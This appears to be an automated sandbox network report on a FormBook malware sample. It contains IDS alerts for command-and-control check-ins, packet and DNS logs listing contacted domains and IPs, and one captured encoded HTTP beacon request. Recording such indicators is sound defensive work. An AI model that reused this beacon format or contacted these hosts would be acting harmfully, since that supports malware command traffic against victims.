                                                                              2025-01-14T10:25:58.319121+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 57601 | 38.47.233.52 | 80 | TCP
                                                                              2025-01-14T10:26:00.896051+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 57602 | 38.47.233.52 | 80 | TCP
                                                                              2025-01-14T10:26:03.413361+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 57603 | 38.47.233.52 | 80 | TCP
                                                                              2025-01-14T10:26:08.910903+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 57604 | 104.21.3.193 | 80 | TCP
                                                                              2025-01-14T10:26:12.082025+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 57605 | 104.21.3.193 | 80 | TCP
                                                                              2025-01-14T10:26:14.006169+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 57606 | 104.21.3.193 | 80 | TCP
                                                                              2025-01-14T10:26:16.567525+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.457607104.21.3.19380TCP
                                                                              2025-01-14T10:26:22.054349+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4576083.33.130.19080TCP
                                                                              2025-01-14T10:26:24.615122+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4576093.33.130.19080TCP
                                                                              2025-01-14T10:26:27.168370+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4576103.33.130.19080TCP
                                                                              2025-01-14T10:26:29.699619+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4576113.33.130.19080TCP
                                                                              2025-01-14T10:26:36.262702+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45761220.244.96.6580TCP
                                                                              2025-01-14T10:26:38.809818+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45761320.244.96.6580TCP
                                                                              2025-01-14T10:26:41.356459+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45761420.244.96.6580TCP
                                                                              2025-01-14T10:26:43.767121+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45761520.244.96.6580TCP
                                                                              2025-01-14T10:26:57.375175+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45761684.32.84.3280TCP
                                                                              2025-01-14T10:26:59.898580+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45761784.32.84.3280TCP
                                                                              2025-01-14T10:27:02.468302+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45761884.32.84.3280TCP
                                                                              2025-01-14T10:27:05.120371+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45761984.32.84.3280TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                              Jan 14, 2025 10:25:34.809561968 CET5754480192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:25:35.827635050 CET5755780192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:25:35.832813978 CET80575573.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:25:35.834328890 CET5755780192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:25:35.843641043 CET5755780192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:25:35.848562956 CET80575573.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:25:36.292016029 CET80575573.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:25:36.292052984 CET80575573.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:25:36.292104959 CET5755780192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:25:37.356621027 CET5755780192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:25:38.376425982 CET5757080192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:25:38.381486893 CET80575703.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:25:38.381757021 CET5757080192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:25:38.397027016 CET5757080192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:25:38.402003050 CET80575703.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:25:38.402021885 CET80575703.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:25:38.402039051 CET80575703.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:25:38.402050972 CET80575703.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:25:38.402138948 CET80575703.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:25:38.402151108 CET80575703.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:25:38.402168036 CET80575703.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:25:38.402179003 CET80575703.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:25:38.402215958 CET80575703.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:25:38.842823982 CET80575703.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:25:38.842950106 CET80575703.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:25:38.843157053 CET5757080192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:25:39.911863089 CET5757080192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:25:40.923155069 CET5758380192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:25:40.928282022 CET80575833.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:25:40.928451061 CET5758380192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:25:40.938628912 CET5758380192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:25:40.943417072 CET80575833.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:25:41.405595064 CET80575833.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:25:41.405663013 CET80575833.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:25:41.405894041 CET5758380192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:25:41.409615993 CET5758380192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:25:41.414396048 CET80575833.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:25:54.863811970 CET5760080192.168.2.438.47.233.52
                                                                              Jan 14, 2025 10:25:54.868777990 CET805760038.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:25:54.868956089 CET5760080192.168.2.438.47.233.52
                                                                              Jan 14, 2025 10:25:54.877959967 CET5760080192.168.2.438.47.233.52
                                                                              Jan 14, 2025 10:25:54.882857084 CET805760038.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:25:55.782677889 CET805760038.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:25:55.782727003 CET805760038.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:25:55.782922029 CET5760080192.168.2.438.47.233.52
                                                                              Jan 14, 2025 10:25:56.387831926 CET5760080192.168.2.438.47.233.52
                                                                              Jan 14, 2025 10:25:57.407483101 CET5760180192.168.2.438.47.233.52
                                                                              Jan 14, 2025 10:25:57.412575006 CET805760138.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:25:57.412674904 CET5760180192.168.2.438.47.233.52
                                                                              Jan 14, 2025 10:25:57.420248985 CET5760180192.168.2.438.47.233.52
                                                                              Jan 14, 2025 10:25:57.425143957 CET805760138.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:25:58.318330050 CET805760138.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:25:58.318921089 CET805760138.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:25:58.319120884 CET5760180192.168.2.438.47.233.52
                                                                              Jan 14, 2025 10:25:58.934756994 CET5760180192.168.2.438.47.233.52
                                                                              Jan 14, 2025 10:25:59.953658104 CET5760280192.168.2.438.47.233.52
                                                                              Jan 14, 2025 10:25:59.959359884 CET805760238.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:25:59.959448099 CET5760280192.168.2.438.47.233.52
                                                                              Jan 14, 2025 10:25:59.969480991 CET5760280192.168.2.438.47.233.52
                                                                              Jan 14, 2025 10:25:59.974364042 CET805760238.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:25:59.974397898 CET805760238.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:25:59.974448919 CET805760238.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:25:59.974477053 CET805760238.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:25:59.974503994 CET805760238.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:25:59.974783897 CET805760238.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:25:59.974812031 CET805760238.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:25:59.974910021 CET805760238.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:25:59.974936962 CET805760238.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:26:00.889535904 CET805760238.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:26:00.895840883 CET805760238.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:26:00.896050930 CET5760280192.168.2.438.47.233.52
                                                                              Jan 14, 2025 10:26:01.481574059 CET5760280192.168.2.438.47.233.52
                                                                              Jan 14, 2025 10:26:02.501532078 CET5760380192.168.2.438.47.233.52
                                                                              Jan 14, 2025 10:26:02.506462097 CET805760338.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:26:02.506577969 CET5760380192.168.2.438.47.233.52
                                                                              Jan 14, 2025 10:26:02.518615007 CET5760380192.168.2.438.47.233.52
                                                                              Jan 14, 2025 10:26:02.523463964 CET805760338.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:26:03.413165092 CET805760338.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:26:03.413218021 CET805760338.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:26:03.413361073 CET5760380192.168.2.438.47.233.52
                                                                              Jan 14, 2025 10:26:03.417162895 CET5760380192.168.2.438.47.233.52
                                                                              Jan 14, 2025 10:26:03.422046900 CET805760338.47.233.52192.168.2.4
                                                                              Jan 14, 2025 10:26:08.437124014 CET5760480192.168.2.4104.21.3.193
                                                                              Jan 14, 2025 10:26:08.441965103 CET8057604104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:08.444470882 CET5760480192.168.2.4104.21.3.193
                                                                              Jan 14, 2025 10:26:08.452037096 CET5760480192.168.2.4104.21.3.193
                                                                              Jan 14, 2025 10:26:08.457813025 CET8057604104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:08.909774065 CET8057604104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:08.910713911 CET8057604104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:08.910902977 CET5760480192.168.2.4104.21.3.193
                                                                              Jan 14, 2025 10:26:09.965852976 CET5760480192.168.2.4104.21.3.193
                                                                              Jan 14, 2025 10:26:10.988842964 CET5760580192.168.2.4104.21.3.193
                                                                              Jan 14, 2025 10:26:10.994343042 CET8057605104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:10.994435072 CET5760580192.168.2.4104.21.3.193
                                                                              Jan 14, 2025 10:26:11.011548042 CET5760580192.168.2.4104.21.3.193
                                                                              Jan 14, 2025 10:26:11.016344070 CET8057605104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:12.081835032 CET8057605104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:12.081856966 CET8057605104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:12.081865072 CET8057605104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:12.082025051 CET5760580192.168.2.4104.21.3.193
                                                                              Jan 14, 2025 10:26:12.082305908 CET8057605104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:12.082353115 CET5760580192.168.2.4104.21.3.193
                                                                              Jan 14, 2025 10:26:12.512708902 CET5760580192.168.2.4104.21.3.193
                                                                              Jan 14, 2025 10:26:13.530896902 CET5760680192.168.2.4104.21.3.193
                                                                              Jan 14, 2025 10:26:13.535877943 CET8057606104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:13.535974979 CET5760680192.168.2.4104.21.3.193
                                                                              Jan 14, 2025 10:26:13.545166969 CET5760680192.168.2.4104.21.3.193
                                                                              Jan 14, 2025 10:26:13.550129890 CET8057606104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:13.550144911 CET8057606104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:13.550163031 CET8057606104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:13.550170898 CET8057606104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:13.550221920 CET8057606104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:13.550230026 CET8057606104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:13.550277948 CET8057606104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:13.550286055 CET8057606104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:13.550296068 CET8057606104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:14.005810022 CET8057606104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:14.006114006 CET8057606104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:14.006169081 CET5760680192.168.2.4104.21.3.193
                                                                              Jan 14, 2025 10:26:15.059575081 CET5760680192.168.2.4104.21.3.193
                                                                              Jan 14, 2025 10:26:16.077802896 CET5760780192.168.2.4104.21.3.193
                                                                              Jan 14, 2025 10:26:16.082681894 CET8057607104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:16.082751989 CET5760780192.168.2.4104.21.3.193
                                                                              Jan 14, 2025 10:26:16.088562012 CET5760780192.168.2.4104.21.3.193
                                                                              Jan 14, 2025 10:26:16.093492985 CET8057607104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:16.567145109 CET8057607104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:16.567369938 CET8057607104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:16.567524910 CET5760780192.168.2.4104.21.3.193
                                                                              Jan 14, 2025 10:26:16.569653034 CET5760780192.168.2.4104.21.3.193
                                                                              Jan 14, 2025 10:26:16.574425936 CET8057607104.21.3.193192.168.2.4
                                                                              Jan 14, 2025 10:26:21.595132113 CET5760880192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:26:21.600004911 CET80576083.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:21.600198984 CET5760880192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:26:21.613159895 CET5760880192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:26:21.618135929 CET80576083.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:22.054047108 CET80576083.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:22.054292917 CET80576083.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:22.054348946 CET5760880192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:26:23.122286081 CET5760880192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:26:24.140250921 CET5760980192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:26:24.145097971 CET80576093.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:24.145185947 CET5760980192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:26:24.153810978 CET5760980192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:26:24.158659935 CET80576093.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:24.615047932 CET80576093.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:24.615080118 CET80576093.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:24.615122080 CET5760980192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:26:25.668987989 CET5760980192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:26:26.686764956 CET5761080192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:26:26.691823006 CET80576103.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:26.691905975 CET5761080192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:26:26.700403929 CET5761080192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:26:26.705265999 CET80576103.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:26.705276966 CET80576103.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:26.705343008 CET80576103.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:26.705349922 CET80576103.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:26.705355883 CET80576103.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:26.705548048 CET80576103.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:26.705562115 CET80576103.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:26.705574036 CET80576103.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:26.705581903 CET80576103.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:27.158287048 CET80576103.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:27.168298960 CET80576103.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:27.168370008 CET5761080192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:26:28.215856075 CET5761080192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:26:29.234262943 CET5761180192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:26:29.239108086 CET80576113.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:29.239207029 CET5761180192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:26:29.244163990 CET5761180192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:26:29.249169111 CET80576113.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:29.699184895 CET80576113.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:29.699289083 CET80576113.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:29.699619055 CET5761180192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:26:29.701724052 CET5761180192.168.2.43.33.130.190
                                                                              Jan 14, 2025 10:26:29.706533909 CET80576113.33.130.190192.168.2.4
                                                                              Jan 14, 2025 10:26:34.737377882 CET5761280192.168.2.420.244.96.65
                                                                              Jan 14, 2025 10:26:34.742202044 CET805761220.244.96.65192.168.2.4
                                                                              Jan 14, 2025 10:26:34.742294073 CET5761280192.168.2.420.244.96.65
                                                                              Jan 14, 2025 10:26:34.751840115 CET5761280192.168.2.420.244.96.65
                                                                              Jan 14, 2025 10:26:34.756666899 CET805761220.244.96.65192.168.2.4
                                                                              Jan 14, 2025 10:26:36.262701988 CET5761280192.168.2.420.244.96.65
                                                                              Jan 14, 2025 10:26:36.268011093 CET805761220.244.96.65192.168.2.4
                                                                              Jan 14, 2025 10:26:36.268053055 CET5761280192.168.2.420.244.96.65
                                                                              Jan 14, 2025 10:26:37.282439947 CET5761380192.168.2.420.244.96.65
                                                                              Jan 14, 2025 10:26:37.287290096 CET805761320.244.96.65192.168.2.4
                                                                              Jan 14, 2025 10:26:37.287381887 CET5761380192.168.2.420.244.96.65
                                                                              Jan 14, 2025 10:26:37.296001911 CET5761380192.168.2.420.244.96.65
                                                                              Jan 14, 2025 10:26:37.300745010 CET805761320.244.96.65192.168.2.4
                                                                              Jan 14, 2025 10:26:38.809818029 CET5761380192.168.2.420.244.96.65
                                                                              Jan 14, 2025 10:26:38.849205971 CET805761320.244.96.65192.168.2.4
                                                                              Jan 14, 2025 10:26:38.849333048 CET5761380192.168.2.420.244.96.65
                                                                              Jan 14, 2025 10:26:39.827924967 CET5761480192.168.2.420.244.96.65
                                                                              Jan 14, 2025 10:26:39.832659006 CET805761420.244.96.65192.168.2.4
                                                                              Jan 14, 2025 10:26:39.832778931 CET5761480192.168.2.420.244.96.65
                                                                              Jan 14, 2025 10:26:39.842066050 CET5761480192.168.2.420.244.96.65
DNS queries

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Jan 14, 2025 10:24:28.115820885 CET | 192.168.2.4 | 1.1.1.1 | 0x9514 | Standard query (0) | www.thesquare.world | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:24:35.030949116 CET | 192.168.2.4 | 1.1.1.1 | 0xd10e | Standard query (0) | 15.164.165.52.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false |
| Jan 14, 2025 10:24:43.690145969 CET | 192.168.2.4 | 1.1.1.1 | 0xfb0a | Standard query (0) | www.revolutionmusic.net | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:24:52.359692097 CET | 192.168.2.4 | 1.1.1.1 | 0x9a30 | Standard query (0) | www.wddb97.top | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:25:06.454384089 CET | 192.168.2.4 | 1.1.1.1 | 0x696c | Standard query (0) | www.nexula.website | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:25:19.767543077 CET | 192.168.2.4 | 1.1.1.1 | 0xb682 | Standard query (0) | www.prediksipreman.fyi | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:25:33.140636921 CET | 192.168.2.4 | 1.1.1.1 | 0x4b17 | Standard query (0) | www.scottconsults.top | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:25:46.421931982 CET | 192.168.2.4 | 1.1.1.1 | 0xc871 | Standard query (0) | www.xtelify.tech | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:25:54.486118078 CET | 192.168.2.4 | 1.1.1.1 | 0x657 | Standard query (0) | www.2q33e.top | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:26:08.421919107 CET | 192.168.2.4 | 1.1.1.1 | 0xa97 | Standard query (0) | www.7wkto5nk230724z.click | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:26:21.579468966 CET | 192.168.2.4 | 1.1.1.1 | 0x3549 | Standard query (0) | www.livingslab.net | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:26:34.720577002 CET | 192.168.2.4 | 1.1.1.1 | 0xba25 | Standard query (0) | www.quickcommerce.cloud | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:26:48.781383991 CET | 192.168.2.4 | 1.1.1.1 | 0x893e | Standard query (0) | www.cybermisha.store | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:26:56.844208956 CET | 192.168.2.4 | 1.1.1.1 | 0x4cd9 | Standard query (0) | www.xpremio.online | A (IP address) | IN (0x0001) | false |
DNS answers

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Jan 14, 2025 10:24:28.133649111 CET | 1.1.1.1 | 192.168.2.4 | 0x9514 | No error (0) | www.thesquare.world | | 13.248.169.48 | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:24:28.133649111 CET | 1.1.1.1 | 192.168.2.4 | 0x9514 | No error (0) | www.thesquare.world | | 76.223.54.146 | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:24:35.039347887 CET | 1.1.1.1 | 192.168.2.4 | 0xd10e | Name error (3) | 15.164.165.52.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false |
| Jan 14, 2025 10:24:44.307868004 CET | 1.1.1.1 | 192.168.2.4 | 0xfb0a | Server failure (2) | www.revolutionmusic.net | none | none | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:24:52.906167030 CET | 1.1.1.1 | 192.168.2.4 | 0x9a30 | No error (0) | www.wddb97.top | wddb97.top | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 14, 2025 10:24:52.906167030 CET | 1.1.1.1 | 192.168.2.4 | 0x9a30 | No error (0) | wddb97.top | | 206.119.82.172 | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:25:06.466124058 CET | 1.1.1.1 | 192.168.2.4 | 0x696c | No error (0) | www.nexula.website | | 67.223.117.142 | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:25:19.781243086 CET | 1.1.1.1 | 192.168.2.4 | 0xb682 | No error (0) | www.prediksipreman.fyi | prediksipreman.fyi | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 14, 2025 10:25:19.781243086 CET | 1.1.1.1 | 192.168.2.4 | 0xb682 | No error (0) | prediksipreman.fyi | | 162.0.215.244 | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:25:33.287178040 CET | 1.1.1.1 | 192.168.2.4 | 0x4b17 | No error (0) | www.scottconsults.top | scottconsults.top | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 14, 2025 10:25:33.287178040 CET | 1.1.1.1 | 192.168.2.4 | 0x4b17 | No error (0) | scottconsults.top | | 3.33.130.190 | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:25:33.287178040 CET | 1.1.1.1 | 192.168.2.4 | 0x4b17 | No error (0) | scottconsults.top | | 15.197.148.33 | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:25:46.432100058 CET | 1.1.1.1 | 192.168.2.4 | 0xc871 | Name error (3) | www.xtelify.tech | none | none | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:25:54.857702971 CET | 1.1.1.1 | 192.168.2.4 | 0x657 | No error (0) | www.2q33e.top | 2q33e.top | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 14, 2025 10:25:54.857702971 CET | 1.1.1.1 | 192.168.2.4 | 0x657 | No error (0) | 2q33e.top | | 38.47.233.52 | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:26:08.435400963 CET | 1.1.1.1 | 192.168.2.4 | 0xa97 | No error (0) | www.7wkto5nk230724z.click | | 104.21.3.193 | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:26:08.435400963 CET | 1.1.1.1 | 192.168.2.4 | 0xa97 | No error (0) | www.7wkto5nk230724z.click | | 172.67.131.32 | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:26:21.591988087 CET | 1.1.1.1 | 192.168.2.4 | 0x3549 | No error (0) | www.livingslab.net | livingslab.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 14, 2025 10:26:21.591988087 CET | 1.1.1.1 | 192.168.2.4 | 0x3549 | No error (0) | livingslab.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:26:21.591988087 CET | 1.1.1.1 | 192.168.2.4 | 0x3549 | No error (0) | livingslab.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:26:34.735532999 CET | 1.1.1.1 | 192.168.2.4 | 0xba25 | No error (0) | www.quickcommerce.cloud | quickcommerce.cloud | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 14, 2025 10:26:34.735532999 CET | 1.1.1.1 | 192.168.2.4 | 0xba25 | No error (0) | quickcommerce.cloud | | 20.244.96.65 | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:26:48.789961100 CET | 1.1.1.1 | 192.168.2.4 | 0x893e | Name error (3) | www.cybermisha.store | none | none | A (IP address) | IN (0x0001) | false |
| Jan 14, 2025 10:26:56.891012907 CET | 1.1.1.1 | 192.168.2.4 | 0x4cd9 | No error (0) | www.xpremio.online | xpremio.online | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 14, 2025 10:26:56.891012907 CET | 1.1.1.1 | 192.168.2.4 | 0x4cd9 | No error (0) | xpremio.online | | 84.32.84.32 | A (IP address) | IN (0x0001) | false |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 49223 | 13.248.169.48 | 80 | 4944 | C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe |
Timestamp: Jan 14, 2025 10:24:28.150047064 CET | Bytes transferred: 442 | Direction: OUT
GET /4qxi/?OvV=2njD6f80EDOLQ8&wz4=2e2Lyydb5YXufeuqFd6wHPkWuEpHgF+t8X6R7x/Chu/ldxqUFwOFXImYee7E7KlqqCMuAjd7uJeZN9yFXwONOjr0nxS6++UxPbCo/R3/4PV751NgF4k6l5M= HTTP/1.1
                                                                              Host: www.thesquare.world
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
Timestamp: Jan 14, 2025 10:24:28.619780064 CET | Bytes transferred: 379 | Direction: IN
HTTP/1.1 200 OK
                                                                              content-type: text/html
                                                                              date: Tue, 14 Jan 2025 09:24:28 GMT
                                                                              content-length: 258
                                                                              connection: close
                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?OvV=2njD6f80EDOLQ8&wz4=2e2Lyydb5YXufeuqFd6wHPkWuEpHgF+t8X6R7x/Chu/ldxqUFwOFXImYee7E7KlqqCMuAjd7uJeZN9yFXwONOjr0nxS6++UxPbCo/R3/4PV751NgF4k6l5M="}</script></head></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
